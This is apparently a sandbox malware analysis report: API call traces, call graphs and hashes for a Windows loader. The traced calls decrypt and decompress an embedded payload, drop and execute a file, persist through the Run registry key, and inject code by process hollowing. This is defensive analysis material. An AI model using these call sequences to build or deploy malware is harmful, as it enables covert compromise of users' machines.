            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_1b0000_Sahofivizu.jbxd
            Similarity
            • API ID: _inittermfreemalloc
            • String ID: 2t
            • API String ID: 1678931842-3527913779
            • Opcode ID: df25920eb69bac706007cce08af52b14f255b03dbdaef1e5609dc9aec3ae7b49
            • Instruction ID: b767695bdef2e3079c4fffa2bc2dbcef452161975ec96d01c09b1c8d2ef9800f
            • Opcode Fuzzy Hash: df25920eb69bac706007cce08af52b14f255b03dbdaef1e5609dc9aec3ae7b49
            • Instruction Fuzzy Hash: 25118232644200EBD724EF79ECA47A577B0FF04B11B52422DF611C79A0D7359A90CB14
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCPInfo.KERNEL32(?,00000000), ref: 10002B0E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.349531459.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000002.00000002.349529168.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349533983.0000000010004000.00000002.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349536461.0000000010005000.00000004.00000001.01000000.00000006.sdmpDownload File
            • Associated: 00000002.00000002.349539416.0000000010006000.00000002.00000001.01000000.00000006.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_10000000_Sahofivizu.jbxd
            Similarity
            • API ID: Info
            • String ID: $
            • API String ID: 1807457897-3032137957
            • Opcode ID: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
            • Instruction ID: 003f6447f42cfeb74655a4253d6df3cc11f9e005fddf9b97507d5db6970036ca
            • Opcode Fuzzy Hash: e4228b001db0409833e9d38f65e39e27da4081846a0795702f68ba4dd2427d8b
            • Instruction Fuzzy Hash: DB413A310083A89AFB26CB14DC89FEF7F98EB017C0F1005F5DA85DB05AC7224948DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:65.9%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:8.7%
            Total number of Nodes:69
            Total number of Limit Nodes:3
            execution_graph 120 402b8a __set_app_type __p__fmode __p__commode 121 402bf9 120->121 122 402c01 __setusermatherr 121->122 123 402c0d 121->123 122->123 132 402cf4 _controlfp 123->132 125 402c12 _initterm __getmainargs _initterm 126 402c66 GetStartupInfoA 125->126 128 402c9a GetModuleHandleA 126->128 133 402779 GetEnvironmentVariableA ??2@YAPAXI 128->133 132->125 180 402419 FindResourceA 133->180 136 4027e2 ??2@YAPAXI 183 402493 CryptAcquireContextA 136->183 137 40284b 186 40266c GetCommandLineA PathGetArgsA 137->186 139 402824 ??3@YAXPAX 139->137 143 4028d8 CreateDirectoryA 145 4028f7 143->145 146 4028f0 143->146 144 4028ce 144->143 144->145 148 402419 6 API calls 145->148 201 402520 12 API calls 146->201 150 402908 148->150 149 4028f6 149->145 151 40296c 150->151 153 40291c 150->153 152 402419 6 API calls 151->152 155 40297d 152->155 154 402493 6 API calls 153->154 156 40292b 154->156 159 402992 155->159 168 4029e2 155->168 157 402150 6 API calls 156->157 160 402943 157->160 158 402a24 12 API calls 161 402419 6 API calls 158->161 162 402493 6 API calls 159->162 202 4021dc PathCombineA SetFileAttributesA CreateFileA 160->202 165 402b18 161->165 166 4029a1 162->166 164 402a0b MessageBoxA 164->158 164->168 169 402b5e GetCurrentProcess GetExitCodeProcess ExitProcess 165->169 172 402493 6 API calls 165->172 170 402150 6 API calls 166->170 168->158 168->164 171 4029b9 170->171 173 4021dc 7 API calls 171->173 174 402b31 172->174 175 4029d7 ??3@YAXPAX 173->175 194 402150 ??2@YAPAXI ??3@YAXPAX ??2@YAPAXI LoadLibraryA GetProcAddress 174->194 175->168 177 402b43 196 402298 13 API calls 177->196 179 402b53 ??3@YAXPAX 179->169 181 402441 SizeofResource LoadResource LockResource Sleep ??2@YAPAXI 180->181 182 40243d 180->182 181->182 182->136 182->137 184 4024c1 CryptAcquireContextA 183->184 185 4024cd CryptCreateHash CryptHashData CryptDeriveKey CryptDecrypt 183->185 184->185 185->139 187 402768 lstrcpyA 186->187 188 402699 ??2@YAPAXI ??2@YAPAXI 186->188 189 402772 GetEnvironmentVariableA PathAppendA PathFileExistsA 187->189 190 4026cf 188->190 189->143 189->144 190->190 191 4026e2 GetEnvironmentVariableA PathCombineA PathCombineA lstrlenA lstrcatA 190->191 192 402756 ??3@YAXPAX ??3@YAXPAX 191->192 193 40274e lstrcatA 191->193 192->189 193->192 195 4021cb ??3@YAXPAX 194->195 195->177 197 4023ce WriteProcessMemory Wow64SetThreadContext ResumeThread 196->197 198 40238f 196->198 197->179 199 402392 WriteProcessMemory 198->199 199->197 199->199 201->149 203 40224a ??3@YAXPAX 202->203 204 40224f WriteFile CloseHandle SetFileAttributesA ShellExecuteA 202->204 203->151 204->203 205 402cdc _exit

            Callgraph

            Control-flow Graph

            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004022A9
            • GetProcAddress.KERNEL32(?,SetThreadContext), ref: 004022E3
            • GetProcAddress.KERNEL32(?,ResumeThread), ref: 004022F0
            • GetProcAddress.KERNEL32(?,CreateProcessA), ref: 004022FD
            • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040230C
            • GetProcAddress.KERNEL32(00000000), ref: 00402313
            • GetProcAddress.KERNEL32(?,VirtualAllocEx), ref: 00402320
            • GetProcAddress.KERNEL32(?,WriteProcessMemory), ref: 0040232D
            • GetProcAddress.KERNEL32(?,GetThreadContext), ref: 0040233A
            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,00000000), ref: 00402356
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 0040235F
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00402372
            • WriteProcessMemory.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00402383
            • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000), ref: 004023BB
            • WriteProcessMemory.KERNELBASE(00000000,?,00000000,00000004,00000000), ref: 004023EF
            • Wow64SetThreadContext.KERNEL32(?,00010007), ref: 00402408
            • ResumeThread.KERNELBASE(?), ref: 0040240E
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: AddressProc$Process$MemoryWrite$Thread$AllocContextCreateHandleLibraryLoadModuleResumeSectionUnmapViewVirtualWow64
            • String ID: ($CreateProcessA$D$GetThreadContext$NtUnmapViewOfSection$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$kernel32.dll$ntdll.dll
            • API String ID: 3764497115-2335503490
            • Opcode ID: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
            • Instruction ID: 2101c5929532744fc004e0de8da0dcc076228160c7658ae0236a057b64dc8bda
            • Opcode Fuzzy Hash: 1a4484b91f31174b06e95d4efd592d181e7a2263aaa2955b226b527c7b6d8b7c
            • Instruction Fuzzy Hash: 4651E471900208AFDB219FA1CD49EEEBBB9FF48704F10406AFA05B61A1D7B59A50DF64
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
            • CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
            • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
            • CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Crypt$AcquireContextHash$CreateDataDecryptDerive
            • String ID: Microsoft Base Cryptographic Provider v1.0
            • API String ID: 2100064926-291530887
            • Opcode ID: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
            • Instruction ID: 6345555bd6a6a2baae484d44cd70709dcbd77d04a333a304fec5576ab75e7cf1
            • Opcode Fuzzy Hash: 9f9c0cb9c7ad4af4a66681f9ff8cb34f727ce906c2f2696f785b290b893db35d
            • Instruction Fuzzy Hash: 6A111576901118BBDF219FD5DE49ECFBF7DEF09751F108062B604B20A0D6B14A54DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • FindResourceA.KERNEL32 ref: 00402431
            • SizeofResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402443
            • LoadResource.KERNEL32(00000000,00000000,?,?,00000000), ref: 00402452
            • LockResource.KERNEL32(00000000,?,?,00000000), ref: 00402459
            • Sleep.KERNELBASE(00000064,?,?,00000000), ref: 00402463
            • ??2@YAPAXI@Z.MSVCRT ref: 00402471
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Resource$??2@FindLoadLockSizeofSleep
            • String ID:
            • API String ID: 3568076173-0
            • Opcode ID: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
            • Instruction ID: 703fe47ab0b1aed84f9ae8a5fdc7b2922fb639b0f7b03c34cd0379616ea940cd
            • Opcode Fuzzy Hash: e3d05aab11850eded8a7556daf18238524d26a7001681dbed2145af7907fd7d4
            • Instruction Fuzzy Hash: 0401A272600221AFC7209F79DD4CE6F7BE9EF8D761F104429FA85E3290D6788880CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00000104,?,?,00000000), ref: 004027B6
            • ??2@YAPAXI@Z.MSVCRT ref: 004027C1
              • Part of subcall function 00402419: FindResourceA.KERNEL32 ref: 00402431
            • ??3@YAXPAX@Z.MSVCRT ref: 0040283E
            • ??3@YAXPAX@Z.MSVCRT ref: 004029DA
            • MessageBoxA.USER32 ref: 00402A0B
            • PathCombineA.SHLWAPI(00000000,00000000,00000688), ref: 00402A56
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A65
            • PathCombineA.SHLWAPI(00000000,00000000,00000994), ref: 00402A7C
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402A85
            • PathCombineA.SHLWAPI(00000000,00000000,00000890), ref: 00402A9C
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AA5
            • PathCombineA.SHLWAPI(00000000,00000000,0000078C), ref: 00402ABC
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AC5
            • PathCombineA.SHLWAPI(00000000,00000000,00000A98), ref: 00402ADC
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402AE5
            • PathCombineA.SHLWAPI(00000000,00000000,00000B9C), ref: 00402AFC
            • DeleteFileA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00402B05
            • ??2@YAPAXI@Z.MSVCRT ref: 004027F9
              • Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000000,75A9B136,00000000,00000000,00000000,00000000,?), ref: 004024BB
              • Part of subcall function 00402493: CryptAcquireContextA.ADVAPI32(00000008,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,00000008), ref: 004024CB
              • Part of subcall function 00402493: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004024DB
              • Part of subcall function 00402493: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004024EB
              • Part of subcall function 00402493: CryptDeriveKey.ADVAPI32(?,00006801,00000000,00000000,?), ref: 00402501
              • Part of subcall function 00402493: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,?), ref: 00402515
            • GetEnvironmentVariableA.KERNEL32(APPDATA,00000000,00000104,?,?,?,?,00000000), ref: 004028A1
            • PathAppendA.SHLWAPI(00000000,00000064), ref: 004028B2
            • PathFileExistsA.SHLWAPI(00000000), ref: 004028BF
            • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 004028E2
            • ??3@YAXPAX@Z.MSVCRT ref: 00402964
            • ??3@YAXPAX@Z.MSVCRT ref: 00402B56
            • GetCurrentProcess.KERNEL32(00000000), ref: 00402B65
            • GetExitCodeProcess.KERNELBASE(00000000), ref: 00402B6C
            • ExitProcess.KERNEL32 ref: 00402B75
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Path$File$CombineCryptDelete$??3@$Process$??2@AcquireContextCreateEnvironmentExitHashVariable$AppendCodeCurrentDataDecryptDeriveDirectoryExistsFindMessageResource
            • String ID: APPDATA$TEMP
            • API String ID: 543592474-1286462511
            • Opcode ID: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
            • Instruction ID: f6e2236e3f10b00cdc1ba35207930b3d891378d713eead9fc05a11d1674366eb
            • Opcode Fuzzy Hash: 597e02f1118b8ffb69c02e7a48af66dc5b946ee98db13f54ee89a2e8b34cccd5
            • Instruction Fuzzy Hash: 44C15CB290011CABDF11EBA0CD89EDE77BDEB48304F1440B6EA05B6191DA749B85DFA4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
            • Instruction ID: 2fb94ac4d71d2bac72fea6894e204766db09a3009eb5ffa048212170574d12fd
            • Opcode Fuzzy Hash: d8f85fa23656ef79cabd7502bc477eafebd37bb0cf6d586a30fbf6c3dacf0e68
            • Instruction Fuzzy Hash: 3B413375844348AFE7249FA4DF8DAAD7BB8BB09714F20013BE541B72E1D7B85841CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT ref: 00402162
            • ??3@YAXPAX@Z.MSVCRT ref: 00402183
            • ??2@YAPAXI@Z.MSVCRT ref: 00402192
            • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 004021A5
            • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 004021B1
            • ??3@YAXPAX@Z.MSVCRT ref: 004021CE
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ??2@??3@$AddressLibraryLoadProc
            • String ID: Ntdll.dll$RtlDecompressBuffer
            • API String ID: 2852400082-662685767
            • Opcode ID: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
            • Instruction ID: 531a7ec942284e6b34a3e9cc2ffd4a3043220942f7d98ccca6845493d414fb18
            • Opcode Fuzzy Hash: 7787bc536107e3c50eb459c9c007716404211b6839400d8fdc558572799896aa
            • Instruction Fuzzy Hash: E901C476900119BFCF049FA4DD4AEDE77B9EF08314F000069FA05B7190D6B56A04CB54
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetCommandLineA.KERNEL32(00000104,00000000), ref: 00402677
            • PathGetArgsA.SHLWAPI(00000000), ref: 00402680
            • ??2@YAPAXI@Z.MSVCRT ref: 004026A0
            • ??2@YAPAXI@Z.MSVCRT ref: 004026A9
            • GetEnvironmentVariableA.KERNEL32(00000670,00000000,00000104,?), ref: 004026F1
            • PathCombineA.SHLWAPI(00000000,00000000,00000064), ref: 0040270B
            • PathCombineA.SHLWAPI(00000000,00000000,-000005A8), ref: 0040271B
            • lstrlenA.KERNEL32(00000000), ref: 0040271E
            • lstrcatA.KERNEL32(j(@,00402134), ref: 00402745
            • lstrcatA.KERNEL32(?,00000000), ref: 00402754
            • ??3@YAXPAX@Z.MSVCRT ref: 00402759
            • ??3@YAXPAX@Z.MSVCRT ref: 0040275F
            • lstrcpyA.KERNEL32(j(@,00000000), ref: 0040276C
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Path$??2@??3@Combinelstrcat$ArgsCommandEnvironmentLineVariablelstrcpylstrlen
            • String ID: j(@
            • API String ID: 1848265983-2441115870
            • Opcode ID: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
            • Instruction ID: 20b46665c5c392077cfaf8139bb222d8e5b4c3735ced006ec0b8e3afc4d8f7d2
            • Opcode Fuzzy Hash: 3c6b8aff4d8e67542f72917e5a93f8b16faca7c1993018cc778e733412f8d674
            • Instruction Fuzzy Hash: A9319032500218AFDF11AF64DD88ADE7BB9EB08354F1040B6F945B72E1DAB95A80CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000001,00000000), ref: 00402552
            • GetEnvironmentVariableA.KERNEL32(00402F66,?,00000104), ref: 004025AC
            • PathCombineA.SHLWAPI(?,?,0040295A), ref: 004025CD
            • PathCombineA.SHLWAPI(?,?,0040234E), ref: 004025E4
            • PathUnquoteSpacesA.SHLWAPI(?), ref: 004025F3
            • CopyFileA.KERNEL32 ref: 00402604
            • PathQuoteSpacesA.SHLWAPI(?), ref: 00402614
            • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00402628
            • lstrlenA.KERNEL32(?), ref: 00402635
            • RegSetValueExA.ADVAPI32(00000000,004028F6,00000000,00000001,?,00000000), ref: 0040264C
            • RegCloseKey.ADVAPI32(00000000), ref: 00402655
            • PathUnquoteSpacesA.SHLWAPI(?), ref: 00402662
            Strings
            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0040261E
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Path$Spaces$CombineFileUnquote$CloseCopyEnvironmentModuleNameOpenQuoteValueVariablelstrlen
            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
            • API String ID: 2107585506-1428018034
            • Opcode ID: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
            • Instruction ID: a86aad1d29e7a7895c0fb444d9a4815063da67e6701978e6f822172513d27bf4
            • Opcode Fuzzy Hash: 83fca13ebf4ad39da448c043303d9b21502982656c2de3e17278bbeabd522527
            • Instruction Fuzzy Hash: 80311DB690425CBFDB11DBA4DD44ACABB7CAB48344F1044B6E689F2150DA709BC88FA4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            • PathCombineA.SHLWAPI(?,00000000,00000000), ref: 0040220F
            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402228
            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040223C
            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040225E
            • CloseHandle.KERNEL32(?), ref: 00402267
            • SetFileAttributesA.KERNEL32(?,00000080), ref: 00402275
            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,?), ref: 0040228B
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.350100728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: File$Attributes$CloseCombineCreateExecuteHandlePathShellWrite
            • String ID: open
            • API String ID: 1472231245-2758837156
            • Opcode ID: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
            • Instruction ID: b8440b774cbbe2fa9ab760de7017495f46494a0c5c1a7f4db0f29674fa40f498
            • Opcode Fuzzy Hash: f51bcf8fff26897ea240e9d3aae106b4200d1664d093c1129e96391cb81a67ab
            • Instruction Fuzzy Hash: 3E119AB580025CBBDF209FA4DD88EDB3F7DEB08390F1045A5B619A20A1D6309A848FA0
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:6.3%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:8.2%
            Total number of Nodes:1002
            Total number of Limit Nodes:25
            execution_graph 6822 4031a0 6823 4031d9 6822->6823 6824 4031cc 6822->6824 6826 401999 __NMSG_WRITE 5 API calls 6823->6826 6825 401999 __NMSG_WRITE 5 API calls 6824->6825 6825->6823 6827 4031e9 __except_handler4 __IsNonwritableInCurrentImage 6826->6827 6828 40326c 6827->6828 6829 403242 __except_handler4 6827->6829 6838 404ec2 RtlUnwind 6827->6838 6829->6828 6830 40325c 6829->6830 6831 401999 __NMSG_WRITE 5 API calls 6829->6831 6832 401999 __NMSG_WRITE 5 API calls 6830->6832 6831->6830 6832->6828 6834 4032be __except_handler4 6835 4032f2 6834->6835 6836 401999 __NMSG_WRITE 5 API calls 6834->6836 6837 401999 __NMSG_WRITE 5 API calls 6835->6837 6836->6835 6837->6829 6838->6834 6811 404084 6814 40352b LeaveCriticalSection 6811->6814 6813 40408b 6814->6813 6815 401c89 6818 40332f 6815->6818 6817 401c8e 6817->6817 6819 403361 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6818->6819 6820 403354 6818->6820 6821 403358 6819->6821 6820->6819 6820->6821 6821->6817 6297 401c4b 6300 4029c7 6297->6300 6301 402141 __getptd_noexit 66 API calls 6300->6301 6302 401c5c 6301->6302 6839 404fac IsProcessorFeaturePresent 6367 404e30 6368 404e42 6367->6368 6370 404e50 @_EH4_CallFilterFunc@8 6367->6370 6369 401999 __NMSG_WRITE 5 API calls 6368->6369 6369->6370 6762 405ad0 RtlUnwind 6763 4021d4 6764 4021e0 __mtinitlocknum 6763->6764 6765 4021f8 6764->6765 6766 4040db _free 66 API calls 6764->6766 6768 4022e2 __mtinitlocknum 6764->6768 6767 402206 6765->6767 6769 4040db _free 66 API calls 6765->6769 6766->6765 6770 402214 6767->6770 6771 4040db _free 66 API calls 6767->6771 6769->6767 6772 402222 6770->6772 6773 4040db _free 66 API calls 6770->6773 6771->6770 6774 4040db _free 66 API calls 6772->6774 6775 402230 6772->6775 6773->6772 6774->6775 6776 40223e 6775->6776 6777 4040db _free 66 API calls 6775->6777 6778 40224c 6776->6778 6779 4040db _free 66 API calls 6776->6779 6777->6776 6780 40225d 6778->6780 6782 4040db _free 66 API calls 6778->6782 6779->6778 6781 403604 __lock 66 API calls 6780->6781 6783 402265 6781->6783 6782->6780 6784 402271 InterlockedDecrement 6783->6784 6785 40228a 6783->6785 6784->6785 6786 40227c 6784->6786 6799 4022ee 6785->6799 6786->6785 6789 4040db _free 66 API calls 6786->6789 6789->6785 6790 403604 __lock 66 API calls 6791 40229e 6790->6791 6792 4022cf 6791->6792 6794 4036c6 ___removelocaleref 8 API calls 6791->6794 6802 4022fa 6792->6802 6797 4022b3 6794->6797 6796 4040db _free 66 API calls 6796->6768 6797->6792 6798 40375f ___freetlocinfo 66 API calls 6797->6798 6798->6792 6805 40352b LeaveCriticalSection 6799->6805 6801 402297 6801->6790 6806 40352b LeaveCriticalSection 6802->6806 6804 4022dc 6804->6796 6805->6801 6806->6804 6840 4059b5 6841 40279b __amsg_exit 66 API calls 6840->6841 6842 4059bc 6841->6842 6359 404517 6360 40415a __calloc_crt 66 API calls 6359->6360 6361 404523 EncodePointer 6360->6361 6362 40453c 6361->6362 6363 404218 6364 40421b 6363->6364 6365 40594f _abort 68 API calls 6364->6365 6366 404227 __mtinitlocknum 6365->6366 6371 403d3a 6381 403cbe 6371->6381 6374 403dce _memset __setmbcp_nolock 6388 403a03 GetCPInfo 6374->6388 6375 403d65 setSBCS 6376 401999 __NMSG_WRITE 5 API calls 6375->6376 6377 403f21 6376->6377 6378 403da9 IsValidCodePage 6378->6375 6379 403dbb GetCPInfo 6378->6379 6379->6374 6379->6375 6398 403c37 6381->6398 6384 403cfb 6386 403d00 GetACP 6384->6386 6387 403ced 6384->6387 6385 403cdd GetOEMCP 6385->6387 6386->6387 6387->6374 6387->6375 6387->6378 6389 403a37 _memset 6388->6389 6397 403aeb 6388->6397 6711 4057ce 6389->6711 6393 401999 __NMSG_WRITE 5 API calls 6395 403b91 6393->6395 6395->6374 6396 4056a1 ___crtLCMapStringA 82 API calls 6396->6397 6397->6393 6399 403c4a 6398->6399 6400 403c97 6398->6400 6401 4021ba __getptd 66 API calls 6399->6401 6400->6384 6400->6385 6402 403c4f 6401->6402 6404 403c77 6402->6404 6406 4038f7 6402->6406 6404->6400 6421 403b93 6404->6421 6407 403903 __mtinitlocknum 6406->6407 6408 4021ba __getptd 66 API calls 6407->6408 6409 403908 6408->6409 6410 403936 6409->6410 6412 40391a 6409->6412 6411 403604 __lock 66 API calls 6410->6411 6413 40393d 6411->6413 6414 4021ba __getptd 66 API calls 6412->6414 6437 4038aa 6413->6437 6416 40391f 6414->6416 6419 40392d __mtinitlocknum 6416->6419 6420 40279b __amsg_exit 66 API calls 6416->6420 6419->6404 6420->6419 6422 403b9f __mtinitlocknum 6421->6422 6423 4021ba __getptd 66 API calls 6422->6423 6424 403ba4 6423->6424 6425 403604 __lock 66 API calls 6424->6425 6426 403bb6 6424->6426 6427 403bd4 6425->6427 6429 403bc4 __mtinitlocknum 6426->6429 6433 40279b __amsg_exit 66 API calls 6426->6433 6428 403c1d 6427->6428 6430 403c05 InterlockedIncrement 6427->6430 6431 403beb InterlockedDecrement 6427->6431 6707 403c2e 6428->6707 6429->6400 6430->6428 6431->6430 6434 403bf6 6431->6434 6433->6429 6434->6430 6435 4040db _free 66 API calls 6434->6435 6436 403c04 6435->6436 6436->6430 6438 4038ec 6437->6438 6439 4038b7 6437->6439 6445 403964 6438->6445 6439->6438 6440 403637 ___addlocaleref 8 API calls 6439->6440 6441 4038cd 6440->6441 6441->6438 6448 4036c6 6441->6448 6706 40352b LeaveCriticalSection 6445->6706 6447 40396b 6447->6416 6449 4036d7 InterlockedDecrement 6448->6449 6450 40375a 6448->6450 6451 4036ec InterlockedDecrement 6449->6451 6452 4036ef 6449->6452 6450->6438 6462 40375f 6450->6462 6451->6452 6453 4036f9 InterlockedDecrement 6452->6453 6454 4036fc 6452->6454 6453->6454 6455 403706 InterlockedDecrement 6454->6455 6456 403709 6454->6456 6455->6456 6457 403713 InterlockedDecrement 6456->6457 6458 403716 6456->6458 6457->6458 6459 40372f InterlockedDecrement 6458->6459 6460 40373f InterlockedDecrement 6458->6460 6461 40374a InterlockedDecrement 6458->6461 6459->6458 6460->6458 6461->6450 6463 4037e3 6462->6463 6472 403776 6462->6472 6464 4040db _free 66 API calls 6463->6464 6465 403830 6463->6465 6466 403804 6464->6466 6479 403859 6465->6479 6532 404fbc 6465->6532 6468 4040db _free 66 API calls 6466->6468 6476 403817 6468->6476 6469 4037aa 6470 4037cb 6469->6470 6483 4040db _free 66 API calls 6469->6483 6477 4040db _free 66 API calls 6470->6477 6472->6463 6472->6469 6475 4040db _free 66 API calls 6472->6475 6473 40389e 6478 4040db _free 66 API calls 6473->6478 6474 4040db _free 66 API calls 6474->6479 6480 40379f 6475->6480 6481 4040db _free 66 API calls 6476->6481 6484 4037d8 6477->6484 6485 4038a4 6478->6485 6479->6473 6482 4040db 66 API calls _free 6479->6482 6492 40539c 6480->6492 6487 403825 6481->6487 6482->6479 6488 4037c0 6483->6488 6489 4040db _free 66 API calls 6484->6489 6485->6438 6490 4040db _free 66 API calls 6487->6490 6520 405333 6488->6520 6489->6463 6490->6465 6493 4053ad 6492->6493 6519 405496 6492->6519 6494 4053be 6493->6494 6495 4040db _free 66 API calls 6493->6495 6496 4053d0 6494->6496 6497 4040db _free 66 API calls 6494->6497 